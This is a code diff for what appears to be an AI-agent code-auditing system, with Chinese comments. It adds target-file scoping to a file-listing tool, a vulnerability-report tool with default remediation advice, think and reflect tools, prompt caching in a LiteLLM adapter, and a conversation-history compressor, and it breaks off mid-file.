@ -428,26 +518,78 @@ class ListFilesTool(AgentTool):
|
|||
if len(files) >= max_files:
|
||||
break
|
||||
else:
|
||||
for item in os.listdir(target_dir):
|
||||
if item in self.EXCLUDE_DIRS:
|
||||
continue
|
||||
# 🔥 如果设置了 target_files,只显示目标文件和包含目标文件的目录
|
||||
if self.target_files:
|
||||
# 计算哪些目录包含目标文件
|
||||
dirs_with_targets = set()
|
||||
for tf in self.target_files:
|
||||
# 获取目标文件的目录部分
|
||||
tf_dir = os.path.dirname(tf)
|
||||
while tf_dir:
|
||||
dirs_with_targets.add(tf_dir)
|
||||
tf_dir = os.path.dirname(tf_dir)
|
||||
|
||||
full_path = os.path.join(target_dir, item)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
if os.path.isdir(full_path):
|
||||
dirs.append(relative_path + "/")
|
||||
else:
|
||||
if pattern and not fnmatch.fnmatch(item, pattern):
|
||||
for item in os.listdir(target_dir):
|
||||
if item in self.exclude_dirs:
|
||||
continue
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
break
|
||||
full_path = os.path.join(target_dir, item)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
if os.path.isdir(full_path):
|
||||
# 只显示包含目标文件的目录
|
||||
if relative_path in dirs_with_targets or any(
|
||||
tf.startswith(relative_path + "/") for tf in self.target_files
|
||||
):
|
||||
dirs.append(relative_path + "/")
|
||||
else:
|
||||
if pattern and not fnmatch.fnmatch(item, pattern):
|
||||
continue
|
||||
|
||||
# 检查是否在目标文件列表中
|
||||
if relative_path not in self.target_files:
|
||||
continue
|
||||
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
break
|
||||
else:
|
||||
# 没有设置 target_files,正常列出
|
||||
for item in os.listdir(target_dir):
|
||||
if item in self.exclude_dirs:
|
||||
continue
|
||||
|
||||
full_path = os.path.join(target_dir, item)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
if os.path.isdir(full_path):
|
||||
dirs.append(relative_path + "/")
|
||||
else:
|
||||
if pattern and not fnmatch.fnmatch(item, pattern):
|
||||
continue
|
||||
|
||||
# 检查排除模式
|
||||
should_skip = False
|
||||
for excl_pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(item, excl_pattern):
|
||||
should_skip = True
|
||||
break
|
||||
if should_skip:
|
||||
continue
|
||||
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
break
|
||||
|
||||
# 格式化输出
|
||||
output_parts = [f"📁 目录: {directory}\n"]
|
||||
|
||||
# 🔥 如果设置了 target_files,显示提示信息
|
||||
if self.target_files:
|
||||
output_parts.append(f"⚠️ 注意: 审计范围限定为 {len(self.target_files)} 个指定文件\n")
|
||||
|
||||
if dirs:
|
||||
output_parts.append("目录:")
|
||||
for d in sorted(dirs)[:20]:
|
||||
|
|
@ -459,6 +601,13 @@ class ListFilesTool(AgentTool):
|
|||
output_parts.append(f"\n文件 ({len(files)}):")
|
||||
for f in sorted(files):
|
||||
output_parts.append(f" 📄 {f}")
|
||||
elif self.target_files:
|
||||
# 如果没有文件但设置了 target_files,显示目标文件列表
|
||||
output_parts.append(f"\n指定的目标文件 ({len(self.target_files)}):")
|
||||
for f in sorted(self.target_files)[:20]:
|
||||
output_parts.append(f" 📄 {f}")
|
||||
if len(self.target_files) > 20:
|
||||
output_parts.append(f" ... 还有 {len(self.target_files) - 20} 个文件")
|
||||
|
||||
if len(files) >= max_files:
|
||||
output_parts.append(f"\n... 结果已截断(最大 {max_files} 个文件)")
|
||||
|
|
|
|||
|
|
@ -0,0 +1,235 @@
|
|||
"""
|
||||
漏洞报告工具
|
||||
|
||||
正式记录漏洞的唯一方式,确保漏洞报告的规范性和完整性。
|
||||
"""
|
||||
|
||||
import logging
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional, List, Dict, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class VulnerabilityReportInput(BaseModel):
|
||||
"""漏洞报告输入参数"""
|
||||
title: str = Field(..., description="漏洞标题")
|
||||
vulnerability_type: str = Field(
|
||||
...,
|
||||
description="漏洞类型: sql_injection, xss, ssrf, command_injection, path_traversal, idor, auth_bypass, etc."
|
||||
)
|
||||
severity: str = Field(
|
||||
...,
|
||||
description="严重程度: critical, high, medium, low, info"
|
||||
)
|
||||
description: str = Field(..., description="漏洞详细描述")
|
||||
file_path: str = Field(..., description="漏洞所在文件路径")
|
||||
line_start: Optional[int] = Field(default=None, description="起始行号")
|
||||
line_end: Optional[int] = Field(default=None, description="结束行号")
|
||||
code_snippet: Optional[str] = Field(default=None, description="相关代码片段")
|
||||
source: Optional[str] = Field(default=None, description="污点来源(用户输入点)")
|
||||
sink: Optional[str] = Field(default=None, description="危险函数(漏洞触发点)")
|
||||
poc: Optional[str] = Field(default=None, description="概念验证/利用方法")
|
||||
impact: Optional[str] = Field(default=None, description="影响分析")
|
||||
recommendation: Optional[str] = Field(default=None, description="修复建议")
|
||||
confidence: float = Field(default=0.8, description="置信度 0.0-1.0")
|
||||
cwe_id: Optional[str] = Field(default=None, description="CWE编号")
|
||||
cvss_score: Optional[float] = Field(default=None, description="CVSS评分")
|
||||
|
||||
|
||||
class CreateVulnerabilityReportTool(AgentTool):
|
||||
"""
|
||||
创建漏洞报告工具
|
||||
|
||||
这是正式记录漏洞的唯一方式。只有通过这个工具创建的漏洞才会被计入最终报告。
|
||||
这个设计确保了漏洞报告的规范性和完整性。
|
||||
|
||||
通常只有专门的报告Agent或验证Agent才会调用这个工具,
|
||||
确保漏洞在被正式报告之前已经经过了充分的验证。
|
||||
"""
|
||||
|
||||
# 存储所有报告的漏洞
|
||||
_vulnerability_reports: List[Dict[str, Any]] = []
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self._reports: List[Dict[str, Any]] = []
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "create_vulnerability_report"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """创建正式的漏洞报告。这是记录已确认漏洞的唯一方式。
|
||||
|
||||
只有在以下情况下才应该使用此工具:
|
||||
1. 漏洞已经过充分分析和验证
|
||||
2. 有明确的证据支持漏洞存在
|
||||
3. 已经评估了漏洞的影响
|
||||
|
||||
必需参数:
|
||||
- title: 漏洞标题
|
||||
- vulnerability_type: 漏洞类型
|
||||
- severity: 严重程度 (critical/high/medium/low/info)
|
||||
- description: 详细描述
|
||||
- file_path: 文件路径
|
||||
|
||||
可选参数:
|
||||
- line_start/line_end: 行号范围
|
||||
- code_snippet: 代码片段
|
||||
- source/sink: 数据流信息
|
||||
- poc: 概念验证
|
||||
- impact: 影响分析
|
||||
- recommendation: 修复建议
|
||||
- confidence: 置信度
|
||||
- cwe_id: CWE编号
|
||||
- cvss_score: CVSS评分"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return VulnerabilityReportInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
title: str,
|
||||
vulnerability_type: str,
|
||||
severity: str,
|
||||
description: str,
|
||||
file_path: str,
|
||||
line_start: Optional[int] = None,
|
||||
line_end: Optional[int] = None,
|
||||
code_snippet: Optional[str] = None,
|
||||
source: Optional[str] = None,
|
||||
sink: Optional[str] = None,
|
||||
poc: Optional[str] = None,
|
||||
impact: Optional[str] = None,
|
||||
recommendation: Optional[str] = None,
|
||||
confidence: float = 0.8,
|
||||
cwe_id: Optional[str] = None,
|
||||
cvss_score: Optional[float] = None,
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""创建漏洞报告"""
|
||||
|
||||
# 验证必需字段
|
||||
if not title or not title.strip():
|
||||
return ToolResult(success=False, error="标题不能为空")
|
||||
|
||||
if not description or not description.strip():
|
||||
return ToolResult(success=False, error="描述不能为空")
|
||||
|
||||
if not file_path or not file_path.strip():
|
||||
return ToolResult(success=False, error="文件路径不能为空")
|
||||
|
||||
# 验证严重程度
|
||||
valid_severities = ["critical", "high", "medium", "low", "info"]
|
||||
severity = severity.lower()
|
||||
if severity not in valid_severities:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"无效的严重程度 '{severity}',必须是: {', '.join(valid_severities)}"
|
||||
)
|
||||
|
||||
# 验证漏洞类型
|
||||
valid_types = [
|
||||
"sql_injection", "nosql_injection", "xss", "ssrf",
|
||||
"command_injection", "code_injection", "path_traversal",
|
||||
"file_inclusion", "idor", "auth_bypass", "broken_auth",
|
||||
"sensitive_data_exposure", "hardcoded_secret", "weak_crypto",
|
||||
"xxe", "deserialization", "race_condition", "business_logic",
|
||||
"csrf", "open_redirect", "mass_assignment", "other"
|
||||
]
|
||||
vulnerability_type = vulnerability_type.lower()
|
||||
if vulnerability_type not in valid_types:
|
||||
# 允许未知类型,但记录警告
|
||||
logger.warning(f"Unknown vulnerability type: {vulnerability_type}")
|
||||
|
||||
# 验证置信度
|
||||
confidence = max(0.0, min(1.0, confidence))
|
||||
|
||||
# 生成报告ID
|
||||
report_id = f"vuln_{uuid.uuid4().hex[:8]}"
|
||||
|
||||
# 构建报告
|
||||
report = {
|
||||
"id": report_id,
|
||||
"title": title.strip(),
|
||||
"vulnerability_type": vulnerability_type,
|
||||
"severity": severity,
|
||||
"description": description.strip(),
|
||||
"file_path": file_path.strip(),
|
||||
"line_start": line_start,
|
||||
"line_end": line_end,
|
||||
"code_snippet": code_snippet,
|
||||
"source": source,
|
||||
"sink": sink,
|
||||
"poc": poc,
|
||||
"impact": impact,
|
||||
"recommendation": recommendation or self._get_default_recommendation(vulnerability_type),
|
||||
"confidence": confidence,
|
||||
"cwe_id": cwe_id,
|
||||
"cvss_score": cvss_score,
|
||||
"created_at": datetime.now(timezone.utc).isoformat(),
|
||||
"is_verified": True, # 通过此工具创建的都视为已验证
|
||||
}
|
||||
|
||||
# 存储报告
|
||||
self._reports.append(report)
|
||||
CreateVulnerabilityReportTool._vulnerability_reports.append(report)
|
||||
|
||||
logger.info(f"Created vulnerability report: [{severity.upper()}] {title}")
|
||||
|
||||
# 返回结果
|
||||
severity_emoji = {
|
||||
"critical": "🔴",
|
||||
"high": "🟠",
|
||||
"medium": "🟡",
|
||||
"low": "🟢",
|
||||
"info": "🔵",
|
||||
}.get(severity, "⚪")
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": f"漏洞报告已创建: {severity_emoji} [{severity.upper()}] {title}",
|
||||
"report_id": report_id,
|
||||
"severity": severity,
|
||||
},
|
||||
metadata=report,
|
||||
)
|
||||
|
||||
def _get_default_recommendation(self, vuln_type: str) -> str:
|
||||
"""获取默认修复建议"""
|
||||
recommendations = {
|
||||
"sql_injection": "使用参数化查询或ORM,避免字符串拼接构造SQL语句",
|
||||
"xss": "对用户输入进行HTML实体编码,使用CSP策略,避免innerHTML",
|
||||
"ssrf": "验证和限制目标URL,使用白名单,禁止访问内网地址",
|
||||
"command_injection": "避免使用shell执行,使用参数列表传递命令,严格验证输入",
|
||||
"path_traversal": "规范化路径后验证,使用白名单,限制访问目录",
|
||||
"idor": "实现细粒度访问控制,验证资源所有权,使用UUID替代自增ID",
|
||||
"auth_bypass": "加强认证逻辑,实现多因素认证,定期审计认证代码",
|
||||
"hardcoded_secret": "使用环境变量或密钥管理服务存储敏感信息",
|
||||
"weak_crypto": "使用强加密算法(AES-256, SHA-256+),避免MD5/SHA1",
|
||||
"xxe": "禁用外部实体解析,使用安全的XML解析器配置",
|
||||
"deserialization": "避免反序列化不可信数据,使用JSON替代pickle/yaml",
|
||||
}
|
||||
return recommendations.get(vuln_type, "请根据具体情况修复此安全问题")
|
||||
|
||||
def get_reports(self) -> List[Dict[str, Any]]:
|
||||
"""获取所有报告"""
|
||||
return self._reports.copy()
|
||||
|
||||
@classmethod
|
||||
def get_all_reports(cls) -> List[Dict[str, Any]]:
|
||||
"""获取所有实例的报告"""
|
||||
return cls._vulnerability_reports.copy()
|
||||
|
||||
@classmethod
|
||||
def clear_all_reports(cls) -> None:
|
||||
"""清空所有报告"""
|
||||
cls._vulnerability_reports.clear()
|
||||
|
|
@ -0,0 +1,167 @@
|
|||
"""
|
||||
Think 工具 - 深度推理工具
|
||||
|
||||
让Agent进行深度思考和推理,用于:
|
||||
- 分析复杂情况
|
||||
- 规划下一步行动
|
||||
- 评估发现的严重性
|
||||
- 决定是否需要创建子Agent
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Optional
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ThinkInput(BaseModel):
|
||||
"""Think工具输入参数"""
|
||||
thought: str = Field(
|
||||
...,
|
||||
description="思考内容,可以是分析、规划、评估等"
|
||||
)
|
||||
category: Optional[str] = Field(
|
||||
default="general",
|
||||
description="思考类别: analysis(分析), planning(规划), evaluation(评估), decision(决策)"
|
||||
)
|
||||
|
||||
|
||||
class ThinkTool(AgentTool):
|
||||
"""
|
||||
Think 工具
|
||||
|
||||
这是一个让Agent进行深度推理的工具。Agent可以用它来:
|
||||
- 分析复杂情况:当面对复杂的代码逻辑或不确定的漏洞线索时
|
||||
- 规划下一步行动:在执行具体操作之前先规划策略
|
||||
- 评估发现的严重性:发现可疑点后评估其真实性和影响
|
||||
- 决定是否需要分解任务:当任务变得复杂时分析是否需要创建子Agent
|
||||
|
||||
Think工具的输出会被记录到Agent的对话历史中,帮助LLM保持思路的连贯性。
|
||||
"""
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "think"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """深度思考工具。用于:
|
||||
1. 分析复杂的代码逻辑或安全问题
|
||||
2. 规划下一步的分析策略
|
||||
3. 评估发现的漏洞是否真实存在
|
||||
4. 决定是否需要深入调查某个方向
|
||||
|
||||
使用此工具记录你的推理过程,这有助于保持分析的连贯性。
|
||||
|
||||
参数:
|
||||
- thought: 你的思考内容
|
||||
- category: 思考类别 (analysis/planning/evaluation/decision)"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return ThinkInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
thought: str,
|
||||
category: str = "general",
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""
|
||||
执行思考
|
||||
|
||||
实际上这个工具不执行任何操作,只是记录思考内容。
|
||||
但它的存在让Agent有一个"思考"的动作,有助于推理。
|
||||
"""
|
||||
if not thought or not thought.strip():
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="思考内容不能为空",
|
||||
)
|
||||
|
||||
thought = thought.strip()
|
||||
|
||||
# 根据类别添加标记
|
||||
category_labels = {
|
||||
"analysis": "🔍 分析",
|
||||
"planning": "📋 规划",
|
||||
"evaluation": "⚖️ 评估",
|
||||
"decision": "🎯 决策",
|
||||
"general": "💭 思考",
|
||||
}
|
||||
|
||||
label = category_labels.get(category, "💭 思考")
|
||||
|
||||
logger.debug(f"Think tool called: [{label}] {thought[:100]}...")
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": f"思考已记录 ({len(thought)} 字符)",
|
||||
"category": category,
|
||||
"label": label,
|
||||
},
|
||||
metadata={
|
||||
"thought": thought,
|
||||
"category": category,
|
||||
"char_count": len(thought),
|
||||
}
|
||||
)
|
||||
|
||||
|
||||
class ReflectTool(AgentTool):
|
||||
"""
|
||||
反思工具
|
||||
|
||||
让Agent回顾和总结当前的分析进展
|
||||
"""
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "reflect"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """反思工具。用于回顾当前的分析进展:
|
||||
1. 总结已经发现的问题
|
||||
2. 评估当前分析的覆盖度
|
||||
3. 识别可能遗漏的方向
|
||||
4. 决定是否需要调整策略
|
||||
|
||||
参数:
|
||||
- summary: 当前进展总结
|
||||
- findings_so_far: 目前发现的问题数量
|
||||
- coverage: 分析覆盖度评估 (low/medium/high)
|
||||
- next_steps: 建议的下一步行动"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return None
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
summary: str = "",
|
||||
findings_so_far: int = 0,
|
||||
coverage: str = "medium",
|
||||
next_steps: str = "",
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""执行反思"""
|
||||
reflection = {
|
||||
"summary": summary,
|
||||
"findings_count": findings_so_far,
|
||||
"coverage": coverage,
|
||||
"next_steps": next_steps,
|
||||
}
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": "反思已记录",
|
||||
"reflection": reflection,
|
||||
},
|
||||
metadata=reflection,
|
||||
)
|
||||
|
|
@ -0,0 +1,52 @@
|
|||
"""
|
||||
LLM 服务模块
|
||||
|
||||
提供统一的 LLM 调用接口,支持:
|
||||
- 多提供商支持(OpenAI, Claude, Gemini, DeepSeek 等)
|
||||
- Prompt Caching(减少 Token 消耗)
|
||||
- Memory Compression(对话历史压缩)
|
||||
- 流式输出
|
||||
- 智能重试
|
||||
"""
|
||||
|
||||
from .service import LLMService
|
||||
from .types import (
|
||||
LLMConfig,
|
||||
LLMProvider,
|
||||
LLMMessage,
|
||||
LLMRequest,
|
||||
LLMResponse,
|
||||
LLMUsage,
|
||||
LLMError,
|
||||
)
|
||||
from .prompt_cache import (
|
||||
PromptCacheManager,
|
||||
CacheConfig,
|
||||
CacheStrategy,
|
||||
CacheStats,
|
||||
prompt_cache_manager,
|
||||
estimate_tokens,
|
||||
)
|
||||
from .memory_compressor import MemoryCompressor
|
||||
|
||||
__all__ = [
|
||||
# Service
|
||||
"LLMService",
|
||||
# Types
|
||||
"LLMConfig",
|
||||
"LLMProvider",
|
||||
"LLMMessage",
|
||||
"LLMRequest",
|
||||
"LLMResponse",
|
||||
"LLMUsage",
|
||||
"LLMError",
|
||||
# Prompt Cache
|
||||
"PromptCacheManager",
|
||||
"CacheConfig",
|
||||
"CacheStrategy",
|
||||
"CacheStats",
|
||||
"prompt_cache_manager",
|
||||
"estimate_tokens",
|
||||
# Memory Compression
|
||||
"MemoryCompressor",
|
||||
]
|
||||
|
|
@ -1,9 +1,15 @@
|
|||
"""
|
||||
LiteLLM 统一适配器
|
||||
支持通过 LiteLLM 调用多个 LLM 提供商,使用统一的 OpenAI 兼容格式
|
||||
|
||||
增强功能:
|
||||
- Prompt Caching: 为支持的 LLM(如 Claude)添加缓存标记
|
||||
- 智能重试: 指数退避重试策略
|
||||
- 流式输出: 支持逐 token 返回
|
||||
"""
|
||||
|
||||
from typing import Dict, Any, Optional
|
||||
import logging
|
||||
from typing import Dict, Any, Optional, List
|
||||
from ..base_adapter import BaseLLMAdapter
|
||||
from ..types import (
|
||||
LLMConfig,
|
||||
|
|
@ -14,6 +20,9 @@ from ..types import (
|
|||
LLMError,
|
||||
DEFAULT_BASE_URLS,
|
||||
)
|
||||
from ..prompt_cache import prompt_cache_manager, estimate_tokens
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class LiteLLMAdapter(BaseLLMAdapter):
|
||||
|
|
@ -108,6 +117,25 @@ class LiteLLMAdapter(BaseLLMAdapter):
|
|||
# 构建消息
|
||||
messages = [{"role": msg.role, "content": msg.content} for msg in request.messages]
|
||||
|
||||
# 🔥 Prompt Caching: 为支持的 LLM 添加缓存标记
|
||||
cache_enabled = False
|
||||
if self.config.provider == LLMProvider.CLAUDE:
|
||||
# 估算系统提示词 token 数
|
||||
system_tokens = 0
|
||||
for msg in messages:
|
||||
if msg.get("role") == "system":
|
||||
system_tokens += estimate_tokens(msg.get("content", ""))
|
||||
|
||||
messages, cache_enabled = prompt_cache_manager.process_messages(
|
||||
messages=messages,
|
||||
model=self.config.model,
|
||||
provider=self.config.provider.value,
|
||||
system_prompt_tokens=system_tokens,
|
||||
)
|
||||
|
||||
if cache_enabled:
|
||||
logger.debug(f"🔥 Prompt Caching enabled for {self.config.model}")
|
||||
|
||||
# 构建请求参数
|
||||
kwargs: Dict[str, Any] = {
|
||||
"model": self._litellm_model,
|
||||
|
|
@ -170,6 +198,14 @@ class LiteLLMAdapter(BaseLLMAdapter):
|
|||
total_tokens=response.usage.total_tokens or 0,
|
||||
)
|
||||
|
||||
# 🔥 更新 Prompt Cache 统计
|
||||
if cache_enabled and hasattr(response.usage, "cache_creation_input_tokens"):
|
||||
prompt_cache_manager.update_stats(
|
||||
cache_creation_input_tokens=getattr(response.usage, "cache_creation_input_tokens", 0),
|
||||
cache_read_input_tokens=getattr(response.usage, "cache_read_input_tokens", 0),
|
||||
total_input_tokens=response.usage.prompt_tokens or 0,
|
||||
)
|
||||
|
||||
return LLMResponse(
|
||||
content=choice.message.content or "",
|
||||
model=response.model,
|
||||
|
|
|
|||
|
|
@ -0,0 +1,349 @@
|
|||
"""
|
||||
Memory Compressor - 对话历史压缩器
|
||||
|
||||
当对话历史变得很长时,自动进行压缩,保持语义完整性的同时降低Token消耗。
|
||||
|
||||
压缩策略:
|
||||
1. 保留所有系统消息
|
||||
2. 保留最近的N条消息
|
||||
3. 对较早的消息进行摘要压缩
|
||||
4. 保留关键信息(发现、决策点、错误)
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# 配置常量
|
||||
MAX_TOTAL_TOKENS = 100_000 # 最大总token数
|
||||
MIN_RECENT_MESSAGES = 15 # 最少保留的最近消息数
|
||||
COMPRESSION_THRESHOLD = 0.9 # 触发压缩的阈值(90%)
|
||||
|
||||
|
||||
def estimate_tokens(text: str) -> int:
|
||||
"""
|
||||
估算文本的token数量
|
||||
|
||||
简单估算:英文约4字符/token,中文约2字符/token
|
||||
"""
|
||||
if not text:
|
||||
return 0
|
||||
|
||||
# 简单估算
|
||||
ascii_chars = sum(1 for c in text if ord(c) < 128)
|
||||
non_ascii_chars = len(text) - ascii_chars
|
||||
|
||||
return (ascii_chars // 4) + (non_ascii_chars // 2) + 1
|
||||
|
||||
|
||||
def get_message_tokens(msg: Dict[str, Any]) -> int:
|
||||
"""获取单条消息的token数"""
|
||||
content = msg.get("content", "")
|
||||
|
||||
if isinstance(content, str):
|
||||
return estimate_tokens(content)
|
||||
|
||||
if isinstance(content, list):
|
||||
total = 0
|
||||
for item in content:
|
||||
if isinstance(item, dict) and item.get("type") == "text":
|
||||
total += estimate_tokens(item.get("text", ""))
|
||||
return total
|
||||
|
||||
return 0
|
||||
|
||||
|
||||
def extract_message_text(msg: Dict[str, Any]) -> str:
|
||||
"""提取消息文本内容"""
|
||||
content = msg.get("content", "")
|
||||
|
||||
if isinstance(content, str):
|
||||
return content
|
||||
|
||||
if isinstance(content, list):
|
||||
parts = []
|
||||
for item in content:
|
||||
if isinstance(item, dict):
|
||||
if item.get("type") == "text":
|
||||
parts.append(item.get("text", ""))
|
||||
elif item.get("type") == "image_url":
|
||||
parts.append("[IMAGE]")
|
||||
return " ".join(parts)
|
||||
|
||||
return str(content)
|
||||
|
||||
|
||||
class MemoryCompressor:
|
||||
"""
|
||||
对话历史压缩器
|
||||
|
||||
当对话历史超过token限制时,自动压缩较早的消息,
|
||||
同时保留关键的安全审计上下文。
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
max_total_tokens: int = MAX_TOTAL_TOKENS,
|
||||
min_recent_messages: int = MIN_RECENT_MESSAGES,
|
||||
llm_service=None,
|
||||
):
|
||||
"""
|
||||
初始化压缩器
|
||||
|
||||
Args:
|
||||
max_total_tokens: 最大总token数
|
||||
min_recent_messages: 最少保留的最近消息数
|
||||
llm_service: LLM服务(用于生成摘要,可选)
|
||||
"""
|
||||
self.max_total_tokens = max_total_tokens
|
||||
self.min_recent_messages = min_recent_messages
|
||||
self.llm_service = llm_service
|
||||
|
||||
def compress_history(
|
||||
self,
|
||||
messages: List[Dict[str, Any]],
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
压缩对话历史
|
||||
|
||||
策略:
|
||||
1. 保留所有系统消息
|
||||
2. 保留最近的N条消息
|
||||
3. 对较早的消息进行摘要压缩
|
||||
4. 保留关键信息
|
||||
|
||||
Args:
|
||||
messages: 原始消息列表
|
||||
|
||||
Returns:
|
||||
压缩后的消息列表
|
||||
"""
|
||||
if not messages:
|
||||
return messages
|
||||
|
||||
# 分离系统消息和普通消息
|
||||
system_msgs = []
|
||||
regular_msgs = []
|
||||
|
||||
for msg in messages:
|
||||
if msg.get("role") == "system":
|
||||
system_msgs.append(msg)
|
||||
else:
|
||||
regular_msgs.append(msg)
|
||||
|
||||
# 计算当前总token数
|
||||
total_tokens = sum(get_message_tokens(msg) for msg in messages)
|
||||
|
||||
# 如果未超过阈值,不需要压缩
|
||||
if total_tokens <= self.max_total_tokens * COMPRESSION_THRESHOLD:
|
||||
return messages
|
||||
|
||||
logger.info(f"Compressing conversation history: {total_tokens} tokens -> target: {int(self.max_total_tokens * 0.7)}")
|
||||
|
||||
# 分离最近消息和较早消息
|
||||
recent_msgs = regular_msgs[-self.min_recent_messages:]
|
||||
old_msgs = regular_msgs[:-self.min_recent_messages] if len(regular_msgs) > self.min_recent_messages else []
|
||||
|
||||
if not old_msgs:
|
||||
return messages
|
||||
|
||||
# 压缩较早的消息
|
||||
compressed = self._compress_messages(old_msgs)
|
||||
|
||||
# 重新组合
|
||||
result = system_msgs + compressed + recent_msgs
|
||||
|
||||
new_total = sum(get_message_tokens(msg) for msg in result)
|
||||
logger.info(f"Compression complete: {total_tokens} -> {new_total} tokens ({100 - new_total * 100 // total_tokens}% reduction)")
|
||||
|
||||
return result
|
||||
|
||||
def _compress_messages(
|
||||
self,
|
||||
messages: List[Dict[str, Any]],
|
||||
chunk_size: int = 10,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
压缩消息列表
|
||||
|
||||
Args:
|
||||
messages: 要压缩的消息
|
||||
chunk_size: 每次压缩的消息数量
|
||||
|
||||
Returns:
|
||||
压缩后的消息列表
|
||||
"""
|
||||
if not messages:
|
||||
return []
|
||||
|
||||
compressed = []
|
||||
|
||||
# 按chunk分组压缩
|
||||
for i in range(0, len(messages), chunk_size):
|
||||
chunk = messages[i:i + chunk_size]
|
||||
summary = self._summarize_chunk(chunk)
|
||||
if summary:
|
||||
compressed.append(summary)
|
||||
|
||||
return compressed
|
||||
|
||||
def _summarize_chunk(self, messages: List[Dict[str, Any]]) -> Optional[Dict[str, Any]]:
|
||||
"""
|
||||
摘要一组消息
|
||||
|
||||
Args:
|
||||
messages: 要摘要的消息
|
||||
|
||||
Returns:
|
||||
摘要消息
|
||||
"""
|
||||
if not messages:
|
||||
return None
|
||||
|
||||
# 提取关键信息
|
||||
key_info = self._extract_key_info(messages)
|
||||
|
||||
# 构建摘要
|
||||
summary_parts = []
|
||||
|
||||
if key_info["findings"]:
|
||||
summary_parts.append(f"发现: {', '.join(key_info['findings'][:5])}")
|
||||
|
||||
if key_info["tools_used"]:
|
||||
summary_parts.append(f"使用工具: {', '.join(key_info['tools_used'][:5])}")
|
||||
|
||||
if key_info["decisions"]:
|
||||
summary_parts.append(f"决策: {', '.join(key_info['decisions'][:3])}")
|
||||
|
||||
if key_info["errors"]:
|
||||
summary_parts.append(f"错误: {', '.join(key_info['errors'][:2])}")
|
||||
|
||||
if not summary_parts:
|
||||
# 如果没有提取到关键信息,生成简单摘要
|
||||
summary_parts.append(f"[已压缩 {len(messages)} 条历史消息]")
|
||||
|
||||
summary_text = " | ".join(summary_parts)
|
||||
|
||||
return {
|
||||
"role": "assistant",
|
||||
"content": f"<context_summary message_count='{len(messages)}'>{summary_text}</context_summary>",
|
||||
}
|
||||
|
||||
def _extract_key_info(self, messages: List[Dict[str, Any]]) -> Dict[str, List[str]]:
|
||||
"""
|
||||
从消息中提取关键信息
|
||||
|
||||
Args:
|
||||
messages: 消息列表
|
||||
|
||||
Returns:
|
||||
关键信息字典
|
||||
"""
|
||||
import re
|
||||
|
||||
key_info = {
|
||||
"findings": [],
|
||||
"tools_used": [],
|
||||
"decisions": [],
|
||||
"errors": [],
|
||||
"files_analyzed": [],
|
||||
}
|
||||
|
||||
for msg in messages:
|
||||
text = extract_message_text(msg).lower()
|
||||
|
||||
# 提取发现的漏洞类型
|
||||
vuln_patterns = {
|
||||
"sql": "SQL注入",
|
||||
"xss": "XSS",
|
||||
"ssrf": "SSRF",
|
||||
"idor": "IDOR",
|
||||
"auth": "认证问题",
|
||||
"injection": "注入漏洞",
|
||||
"traversal": "路径遍历",
|
||||
"deserialization": "反序列化",
|
||||
"hardcoded": "硬编码凭证",
|
||||
"secret": "密钥泄露",
|
||||
}
|
||||
|
||||
for pattern, label in vuln_patterns.items():
|
||||
if pattern in text and ("发现" in text or "漏洞" in text or "finding" in text or "vulnerability" in text):
|
||||
if label not in key_info["findings"]:
|
||||
key_info["findings"].append(label)
|
||||
|
||||
# 提取工具使用
|
||||
tool_match = re.search(r'action:\s*(\w+)', text, re.IGNORECASE)
|
||||
if tool_match:
|
||||
tool = tool_match.group(1)
|
||||
if tool not in key_info["tools_used"]:
|
||||
key_info["tools_used"].append(tool)
|
||||
|
||||
# 提取分析的文件
|
||||
file_patterns = [
|
||||
r'读取文件[::]\s*([^\s\n]+)',
|
||||
r'分析文件[::]\s*([^\s\n]+)',
|
||||
r'file[_\s]?path[::]\s*["\']?([^\s\n"\']+)',
|
||||
